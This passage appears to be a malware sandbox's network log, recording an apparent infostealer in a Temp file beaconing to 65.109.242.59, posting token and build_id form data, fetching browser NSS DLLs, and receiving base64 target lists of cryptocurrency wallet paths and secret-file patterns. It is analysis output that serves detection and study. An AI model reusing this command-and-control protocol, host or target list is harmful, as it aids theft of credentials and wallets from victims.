                                                                              2024-05-26 08:23:23 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              17 | 192.168.2.4 | 52675 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:24 UTC | 279 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 1529
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:24 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DGIJEGHDAECAKECAFCAKCont
                                                                              2024-05-26 08:23:24 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              18 | 192.168.2.4 | 52677 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:25 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 437
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:25 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------AKECBFBAEBKJJJJKFCGCCont
                                                                              2024-05-26 08:23:26 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:26 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              19 | 192.168.2.4 | 52679 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:26 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 437
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:26 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JKJDBAAAEHIEGCAKFHCGCont
                                                                              2024-05-26 08:23:27 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:27 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              20 | 192.168.2.4 | 52680 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:28 UTC | 173 | OUT | GET /freebl3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:28 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:28 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 685392
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-a7550"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                              Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                              Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                              Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                              Data Ascii: 0<48%8A)$(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 52681 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp

Timestamp | Bytes transferred | Direction | Data
2024-05-26 08:23:29 UTC | 173 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Cache-Control: no-cache
2024-05-26 08:23:30 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 08:23:30 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-94750"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 52682 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp

Timestamp | Bytes transferred | Direction | Data
2024-05-26 08:23:31 UTC | 174 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Cache-Control: no-cache
2024-05-26 08:23:32 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 08:23:31 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 52683 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp

Timestamp | Bytes transferred | Direction | Data
2024-05-26 08:23:33 UTC | 170 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Cache-Control: no-cache
2024-05-26 08:23:33 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 08:23:33 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              24 | 192.168.2.4 | 52684 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:36 UTC | 174 | OUT | GET /softokn3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:36 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:36 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 257872
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-3ef50"
                                                                              Accept-Ranges: bytes


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              25 | 192.168.2.4 | 52685 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:38 UTC | 178 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:38 UTC | 245 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:38 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 80880
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-13bf0"
                                                                              Accept-Ranges: bytes


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              26 | 192.168.2.4 | 52686 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:40 UTC | 279 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 1145
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:40 UTC | 1145 | OUT | Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GIEHJDHCBAEHJJJKKFIDCont
                                                                              2024-05-26 08:23:41 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              27 | 192.168.2.4 | 52687 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:41 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:41 UTC | 331 | OUT | Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KEBFHIJECFIDGDGCGHCGCont
                                                                              2024-05-26 08:23:42 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:42 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              28 | 192.168.2.4 | 52688 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:43 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:43 UTC | 331 | OUT | Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DAAFBAKECAEGCBFIEGDGCont
                                                                              2024-05-26 08:23:44 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              29 | 192.168.2.4 | 52689 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:45 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:45 UTC | 331 | OUT | Data Ascii: ------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IJDGCAEBFIIECAKFHIJECont
                                                                              2024-05-26 08:23:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:45 UTC | 1524 | IN | Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              30 | 192.168.2.4 | 52690 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:46 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJ
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 453
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:46 UTC | 453 | OUT | Data Ascii: ------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IDAEHCFHJJJJECAAFBKJCont
                                                                              2024-05-26 08:23:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              31 | 192.168.2.4 | 52691 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:48 UTC | 281 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKE
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 129229
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:48 UTC | 16355 | OUT | Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------AFCBAEBAEBFHCAKFCAKECont
                                                                              2024-05-26 08:23:50 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:50 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              32 | 192.168.2.4 | 52692 | 65.109.242.59 | 443 | 6620 | C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-26 08:23:51 UTC | 278 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
